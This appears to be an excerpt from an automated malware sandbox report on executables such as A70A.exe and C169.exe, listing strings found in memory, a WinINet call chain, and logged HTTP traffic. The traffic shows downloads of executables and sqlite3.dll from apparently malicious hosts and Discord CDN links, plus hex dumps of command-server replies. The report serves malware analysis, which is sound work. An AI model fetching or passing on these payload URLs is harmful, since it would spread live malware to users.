                        Source: A70A.exe, 0000000B.00000002.606343545.0000000004099000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.594676104.0000000002E09000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.598347234.000000000302C000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.593807750.0000000002CE4000.00000004.00000001.sdmpString found in binary or memory: http://www.interoperabilitybridges.com/wmp-extension-for-chrome
                        Source: A70A.exe, 0000000B.00000003.417761499.0000000003471000.00000004.00000001.sdmpString found in binary or memory: http://www.ncn.gov.pl/finansowanie-nauki/pomoc-publiczna
                        Source: A70A.exe, 0000000B.00000000.415048801.0000000001327000.00000002.00020000.sdmp, A70A.exe, 0000000B.00000002.576541484.0000000001327000.00000002.00020000.sdmp, A70A.exe, 0000000B.00000003.417761499.0000000003471000.00000004.00000001.sdmpString found in binary or memory: http://www.ncn.gov.pl/finansowanie-nauki/pomoc-publicznayX
                        Source: A70A.exe, 0000000B.00000003.417761499.0000000003471000.00000004.00000001.sdmpString found in binary or memory: http://www.stat.gov.pl/cps/rde/xbcr/bip/BIP_oz_wykaz_identyfikatorow.pdf
                        Source: A70A.exe, 0000000B.00000000.415048801.0000000001327000.00000002.00020000.sdmp, A70A.exe, 0000000B.00000002.576541484.0000000001327000.00000002.00020000.sdmp, A70A.exe, 0000000B.00000003.417761499.0000000003471000.00000004.00000001.sdmpString found in binary or memory: http://www.stat.gov.pl/cps/rde/xbcr/bip/BIP_oz_wykaz_identyfikatorow.pdfyX
                        Source: A70A.exe, 0000000B.00000002.603991878.0000000003EBE000.00000004.00000001.sdmp, A70A.exe, 0000000B.00000002.603065372.0000000003E71000.00000004.00000001.sdmp, A70A.exe, 0000000B.00000002.603701559.0000000003EA8000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.600555939.0000000003D43000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.599060773.00000000030D7000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.595143338.0000000002EB5000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.594676104.0000000002E09000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.596302776.0000000002ECB000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.599190914.00000000030ED000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.600180400.0000000003CD2000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.598347234.000000000302C000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.598194373.0000000003016000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.593807750.0000000002CE4000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.594596354.0000000002DF3000.00000004.00000001.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                        Source: A70A.exe, 0000000B.00000002.600595408.0000000003C31000.00000004.00000001.sdmp, C169.exe, 00000010.00000002.499816087.0000000003BB1000.00000004.00000001.sdmp, C169.exe, 00000017.00000000.476958517.0000000000402000.00000040.00000001.sdmp, C169.exe, 00000017.00000002.593807750.0000000002CE4000.00000004.00000001.sdmpString found in binary or memory: https://api.ip.sb/ip
                        Source: C169.exe, 00000017.00000002.597704836.0000000002FA1000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.com
                        Source: C169.exe, 00000017.00000002.593626249.0000000002CE0000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.596302776.0000000002ECB000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.597625234.0000000002F9B000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/914960103592054858/914986994759794738/Underdosed.exe
                        Source: C169.exe, 00000017.00000002.597704836.0000000002FA1000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.com4
                        Source: A70A.exe, 0000000B.00000002.603991878.0000000003EBE000.00000004.00000001.sdmp, A70A.exe, 0000000B.00000002.603065372.0000000003E71000.00000004.00000001.sdmp, A70A.exe, 0000000B.00000002.603701559.0000000003EA8000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.600555939.0000000003D43000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.599060773.00000000030D7000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.595143338.0000000002EB5000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.594676104.0000000002E09000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.596302776.0000000002ECB000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.599190914.00000000030ED000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.600180400.0000000003CD2000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.598347234.000000000302C000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.598194373.0000000003016000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.593807750.0000000002CE4000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.594596354.0000000002DF3000.00000004.00000001.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                        Source: A70A.exe, 0000000B.00000000.415048801.0000000001327000.00000002.00020000.sdmp, A70A.exe, 0000000B.00000002.576541484.0000000001327000.00000002.00020000.sdmp, A70A.exe, 0000000B.00000003.417761499.0000000003471000.00000004.00000001.sdmpString found in binary or memory: https://cdn.jsdelivr.net/npm/popper.js
                        Source: A70A.exe, 0000000B.00000000.415048801.0000000001327000.00000002.00020000.sdmp, A70A.exe, 0000000B.00000002.576541484.0000000001327000.00000002.00020000.sdmp, A70A.exe, 0000000B.00000003.417761499.0000000003471000.00000004.00000001.sdmpString found in binary or memory: https://code.jquery.com/jquery-3.4.1.slim.min.js
                        Source: A70A.exe, 0000000B.00000000.415048801.0000000001327000.00000002.00020000.sdmp, A70A.exe, 0000000B.00000002.576541484.0000000001327000.00000002.00020000.sdmp, A70A.exe, 0000000B.00000003.417761499.0000000003471000.00000004.00000001.sdmpString found in binary or memory: https://connect.facebook.net/en_US/fbevents.js
                        Source: C169.exe, 00000017.00000002.598347234.000000000302C000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.598194373.0000000003016000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.593807750.0000000002CE4000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.594596354.0000000002DF3000.00000004.00000001.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                        Source: A70A.exe, 0000000B.00000002.603991878.0000000003EBE000.00000004.00000001.sdmp, A70A.exe, 0000000B.00000002.603065372.0000000003E71000.00000004.00000001.sdmp, A70A.exe, 0000000B.00000002.603701559.0000000003EA8000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.600555939.0000000003D43000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.599060773.00000000030D7000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.595143338.0000000002EB5000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.594676104.0000000002E09000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.596302776.0000000002ECB000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.599190914.00000000030ED000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.598347234.000000000302C000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.598194373.0000000003016000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.593807750.0000000002CE4000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.594596354.0000000002DF3000.00000004.00000001.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                        Source: A70A.exe, 0000000B.00000002.603991878.0000000003EBE000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.594676104.0000000002E09000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.596302776.0000000002ECB000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.599190914.00000000030ED000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.598347234.000000000302C000.00000004.00000001.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab4
                        Source: C169.exe, 00000017.00000002.600180400.0000000003CD2000.00000004.00000001.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtabx
                        Source: C169.exe, 00000017.00000002.598347234.000000000302C000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.598194373.0000000003016000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.593807750.0000000002CE4000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.594596354.0000000002DF3000.00000004.00000001.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                        Source: A70A.exe, 0000000B.00000002.606343545.0000000004099000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.594676104.0000000002E09000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.598347234.000000000302C000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.593807750.0000000002CE4000.00000004.00000001.sdmpString found in binary or memory: https://get.adob
                        Source: A70A.exe, 0000000B.00000002.606343545.0000000004099000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.594676104.0000000002E09000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.598347234.000000000302C000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.593807750.0000000002CE4000.00000004.00000001.sdmpString found in binary or memory: https://helpx.ad
                        Source: A70A.exe, 0000000B.00000002.603991878.0000000003EBE000.00000004.00000001.sdmp, A70A.exe, 0000000B.00000002.603065372.0000000003E71000.00000004.00000001.sdmp, A70A.exe, 0000000B.00000002.603701559.0000000003EA8000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.600555939.0000000003D43000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.599060773.00000000030D7000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.595143338.0000000002EB5000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.594676104.0000000002E09000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.596302776.0000000002ECB000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.599190914.00000000030ED000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.600180400.0000000003CD2000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.598347234.000000000302C000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.598194373.0000000003016000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.593807750.0000000002CE4000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.594596354.0000000002DF3000.00000004.00000001.sdmpString found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
                        Source: A70A.exe, 0000000B.00000002.603991878.0000000003EBE000.00000004.00000001.sdmp, A70A.exe, 0000000B.00000002.603065372.0000000003E71000.00000004.00000001.sdmp, A70A.exe, 0000000B.00000002.603701559.0000000003EA8000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.600555939.0000000003D43000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.599060773.00000000030D7000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.595143338.0000000002EB5000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.594676104.0000000002E09000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.596302776.0000000002ECB000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.599190914.00000000030ED000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.600180400.0000000003CD2000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.598347234.000000000302C000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.598194373.0000000003016000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.593807750.0000000002CE4000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.594596354.0000000002DF3000.00000004.00000001.sdmpString found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                        Source: A70A.exe, 0000000B.00000000.415048801.0000000001327000.00000002.00020000.sdmp, A70A.exe, 0000000B.00000002.576541484.0000000001327000.00000002.00020000.sdmp, A70A.exe, 0000000B.00000003.417761499.0000000003471000.00000004.00000001.sdmpString found in binary or memory: https://socfinder.site
                        Source: A70A.exe, 0000000B.00000000.415048801.0000000001327000.00000002.00020000.sdmp, A70A.exe, 0000000B.00000002.576541484.0000000001327000.00000002.00020000.sdmp, A70A.exe, 0000000B.00000003.417761499.0000000003471000.00000004.00000001.sdmpString found in binary or memory: https://socfinder.site/
                        Source: A70A.exe, 0000000B.00000000.415048801.0000000001327000.00000002.00020000.sdmp, A70A.exe, 0000000B.00000002.576541484.0000000001327000.00000002.00020000.sdmp, A70A.exe, 0000000B.00000003.417761499.0000000003471000.00000004.00000001.sdmpString found in binary or memory: https://stackpath.bootstrapcdn.com/bootstrap/4.4.1/js/bootstrap.min.js
                        Source: C169.exe, 00000017.00000002.593807750.0000000002CE4000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_divx
                        Source: C169.exe, 00000017.00000002.593807750.0000000002CE4000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
                        Source: A70A.exe, 0000000B.00000002.606343545.0000000004099000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.594676104.0000000002E09000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.598347234.000000000302C000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.593807750.0000000002CE4000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_java
                        Source: A70A.exe, 0000000B.00000002.606343545.0000000004099000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.594676104.0000000002E09000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.598347234.000000000302C000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.593807750.0000000002CE4000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_pdf
                        Source: A70A.exe, 0000000B.00000002.606343545.0000000004099000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.594676104.0000000002E09000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.598347234.000000000302C000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.593807750.0000000002CE4000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_quicktime
                        Source: A70A.exe, 0000000B.00000002.606343545.0000000004099000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.594676104.0000000002E09000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.598347234.000000000302C000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.593807750.0000000002CE4000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_real
                        Source: C169.exe, 00000017.00000002.593807750.0000000002CE4000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_shockwave
                        Source: A70A.exe, 0000000B.00000002.606343545.0000000004099000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.594676104.0000000002E09000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.598347234.000000000302C000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.593807750.0000000002CE4000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_wmp
                        Source: C169.exe, 00000017.00000002.593807750.0000000002CE4000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/answer/6258784
                        Source: A70A.exe, 0000000B.00000002.603991878.0000000003EBE000.00000004.00000001.sdmp, A70A.exe, 0000000B.00000002.603065372.0000000003E71000.00000004.00000001.sdmp, A70A.exe, 0000000B.00000002.603701559.0000000003EA8000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.600555939.0000000003D43000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.599060773.00000000030D7000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.595143338.0000000002EB5000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.594676104.0000000002E09000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.596302776.0000000002ECB000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.599190914.00000000030ED000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.600180400.0000000003CD2000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.598347234.000000000302C000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.598194373.0000000003016000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.593807750.0000000002CE4000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.594596354.0000000002DF3000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                        Source: A70A.exe, 0000000B.00000000.415048801.0000000001327000.00000002.00020000.sdmp, A70A.exe, 0000000B.00000002.576541484.0000000001327000.00000002.00020000.sdmp, A70A.exe, 0000000B.00000003.417761499.0000000003471000.00000004.00000001.sdmpString found in binary or memory: https://www.googletagmanager.com/gtag/js?id=UA-133188560-4
                        Source: unknownDNS traffic detected: queries for: host-data-coin-11.com
                        Source: C:\Users\user\AppData\Local\Temp\AA02.exeCode function: 22_2_00404A20 GetProcessHeap,RtlAllocateHeap,InternetOpenA,InternetSetOptionA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,InternetConnectA,HttpOpenRequestA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrlen,lstrlen,GetProcessHeap,HeapAlloc,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,lstrcatA,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,
                        Source: global trafficHTTP traffic detected: GET /attachments/914960103592054858/914961866462232616/Oldening.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: cdn.discordapp.com
                        Source: global trafficHTTP traffic detected: GET /files/8723_1638191106_2017.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: host-file-host-3.com
                        Source: global trafficHTTP traffic detected: GET /files/6096_1638289274_6885.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: host-file-host-3.com
                        Source: global trafficHTTP traffic detected: GET /game.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: host-file-host-3.com
                        Source: global trafficHTTP traffic detected: GET /downloads/toolspab3.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: privacytoolzforyou-7000.com
                        Source: global trafficHTTP traffic detected: GET /files/4152_1638095425_4339.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: host-file-host-3.com
                        Source: global trafficHTTP traffic detected: GET /tratata.php HTTP/1.1Host: file-file-host4.comConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /sqlite3.dll HTTP/1.1Host: file-file-host4.comCache-Control: no-cacheCookie: PHPSESSID=sc69tg8a29f4pr0nv46ehfqbko
                        Source: global trafficHTTP traffic detected: GET /files/5311_1638303032_7343.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: host-file-host-3.com
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
                        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Wed, 01 Dec 2021 09:04:26 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 0d 0a 14 00 00 00 7b fa f7 1b b5 69 2b 2c 47 fa 0e a8 c1 82 9f 4f 1a c4 da 16 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 19{i+,GO0
                        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Wed, 01 Dec 2021 09:04:26 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Wed, 01 Dec 2021 09:04:28 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 34 36 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f c9 88 55 13 26 14 f9 aa 89 ff a2 1e b7 08 93 31 f9 55 50 99 4a f7 e0 25 e5 39 1a 46 eb ab 8f 70 bc 57 da 4a d7 f7 26 84 22 e9 c3 90 50 2a e1 a8 1d 63 a9 0d 0a 30 0d 0a 0d 0a Data Ascii: 46I:82OU&1UPJ%9FpWJ&"P*c0
                        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Wed, 01 Dec 2021 09:04:35 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Wed, 01 Dec 2021 09:04:36 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 36 35 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e 84 42 09 25 16 f9 b5 8f bd b8 15 a5 0c ce 2c b4 59 52 db 04 e5 fd 28 e3 22 58 1b b2 ed cf 00 b4 50 dd 4b d0 fe 26 85 21 ea a5 90 50 2e e2 be 4d 23 e3 b3 b4 6c fb 9f bc 50 ab 73 93 cb 32 40 5c 3c 0d 4b dd bb 4a be ff 57 99 bd d4 0b 8d 2b 80 cf 0d 0a 30 0d 0a 0d 0a Data Ascii: 65I:82OB%,YR("XPK&!P.M#lPs2@\<KJW+0
                        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Wed, 01 Dec 2021 09:04:38 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
